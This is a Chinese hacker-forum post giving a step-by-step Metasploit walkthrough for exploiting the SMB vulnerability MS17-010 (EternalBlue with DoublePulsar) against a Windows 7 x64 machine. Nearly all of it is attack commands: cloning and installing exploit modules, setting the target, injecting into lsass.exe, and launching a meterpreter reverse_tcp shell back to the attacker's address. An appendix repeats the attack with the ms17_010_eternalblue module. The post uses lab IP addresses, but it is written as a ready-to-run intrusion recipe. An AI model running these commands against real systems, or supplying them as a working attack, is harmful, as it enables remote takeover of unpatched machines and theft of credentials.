跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

smb(ms17-010)远程命令执行之msf

HACK1949
HACK1949
WEB和服务器安全漏洞

精选回复

发布于

本次用到的环境:

kali(2016.2)32位系统.ip地址:192.168.1.104

目标靶机为:win7sp1x64系统(关闭防火墙),ip地址:192.168.1.105

具体的步骤如下:

kali系统下安装wine32:

apt-get install wine32

 1049983-20170503234418523-665320377.png

 

用wine32执行cmd.exe

wine cmd.exe

 1049983-20170503234435117-119788294.png

exit        //退出

 1049983-20170503234519414-223592321.png

 git  clone下载其利用脚本:

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

然后将脚本拷贝到 /usr/share/metasploit-framework/modules/exploits/windows/smb

cd    Eternalblue-Doublepulsar-Metasploit/
cp  -r  deps/  eternalblue_doublepulsar.rb    /usr/share/metasploit-framework/modules/exploits/windows/smb

 1049983-20170503234544164-140724269.png

1049983-20170503234558476-1001254172.png

启动msf,然后进行一系列设置:

service postgresql start

msfconsole

 1049983-20170503234611898-817206230.png

 

search  eternalblue

use  exploit/windows/smb/eternalblue_doublepulsar

1049983-20170503234627007-978748410.png

 

 set   DOUBLEPULSARPATH  /usr/share/metasploit-framework/modules/exploits/windows/smb/deps

  set  ETERNALBLUEPATH   /usr/share/metasploit-framework/modules/exploits/windows/smb/deps

set PROCESSINJECT   lsass.exe

set TARGETARCHITECTURE  x64

set rhost  192.168.1.105

show targets

set target 9

set payload windows/x64/meterpreter/reverse_tcp

show options

set lhost 192.168.1.104

exploit

 1049983-20170503234641695-125161408.png

1049983-20170503234649992-1952014472.png

1049983-20170503234655195-1738889453.png

 1049983-20170504000200867-842849868.png

附录:

msf下的ms17-010模块:

前提条件:

1. gem install ruby_smb #ruby_smb模块安装

2.msfupdate   #msf的更新

3.msfconsole -qx "use exploit/windows/smb/ms17_010_eternalblue"  #启动并加载模块

 

root@backlion:/opt# wget https://raw.githubusercontent.com/backlion/metasploit-framework/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb

root@backlion:/opt# cp ms17_010_eternalblue.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb

Use exploit/windows/smb/ms17_010_eternalblue

msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.8

msf exploit(ms17_010_eternalblue) >set lhost 192.168.1.21

msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp

msf exploit(ms17_010_eternalblue) >exploit

Meterpreter> sysinfo

 

 

 

 1049983-20170719142032536-1361560502.png

 

 

 



创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。